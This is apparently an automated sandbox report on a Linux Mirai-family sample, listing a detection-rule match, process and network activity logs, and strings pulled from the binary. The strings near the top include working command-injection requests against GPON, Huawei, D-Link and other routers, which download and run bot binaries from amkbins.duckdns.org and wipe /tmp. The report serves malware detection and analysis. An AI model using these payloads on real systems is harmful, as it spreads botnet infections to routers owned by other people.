            Source: 6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+amkbins.duckdns.org/bins/ascaris.arm;chmod+777+/tmp/ascaris.arm;sh+/tmp/ascaris.arm HTTP/1.1
            Source: Initial samplePotential command found: GET /shell?cd /tmp; wget http:/\/amkbins.duckdns.org/bins/ascaris.arm; chmod 777 ascaris.arm; ./ascaris.arm jaws.selfrep;rm -rf ascaris.arm HTTP/1.1
            Source: Initial samplePotential command found: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1
            Source: Initial samplePotential command found: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0
            Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1
            Source: Initial samplePotential command found: GET /index.php?s=/index/hink
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://amkbins.duckdns.org/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
            Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://amkbins.duckdns.org/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0 (0(,POST /GponForm/diag_Form?images/ HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: _<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?>SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;<NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://amkbins.duckdns.org/bins/ascaris.mips && chmod 777 /tmp/ascaris.mips && /tmp/ascaris.mips dir.selfrep`</NewNTPServer1><NewNTPServer2>`echo tbox`</NewNTPServer2><NewNTPServer3>`echo tbox`</NewNTPServer3><NewNTPServer4>`echo tbox`</NewNTPServer4><NewNTPServer5>`echo tbox`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
            Source: classification engineClassification label: mal96.troj.linELF@0/0@2/0
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1582/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/3088/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1579/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1699/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1335/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1698/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1334/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1576/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/2302/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/910/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/912/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6228/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/2307/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/918/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6240/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6242/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6245/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6244/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6247/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1594/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1349/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1344/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1465/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1586/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1463/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1900/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6254/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6253/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6257/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/491/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/6250/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1599/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1477/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/379/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1476/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/fMB6uAXjd0.elf (PID: 6239)File opened: /proc/1475/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 43184 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51346 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 51346
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56284 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56284
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 59968 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55998 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 55998
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 58804 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58804
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58804
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58830
            Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 53048 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55490 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41202 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 54768 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 54768
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 40572 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 40582 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55776 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55778 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43026 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 47714 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41250 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 41250
            Source: unknownNetwork traffic detected: HTTP traffic on port 54112 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54114 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38180 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51244 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38356 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38830 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44328 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46998 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46386 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46386 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56812 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 58652 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36936 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 57460 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 57460
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60244 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54970 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41142 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35630 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44076 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57016 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 57016
            Source: unknownNetwork traffic detected: HTTP traffic on port 53108 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56158 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 53108
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56158
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57380 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52124 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51748 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41058 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 51748
            Source: unknownNetwork traffic detected: HTTP traffic on port 38626 -> 52869
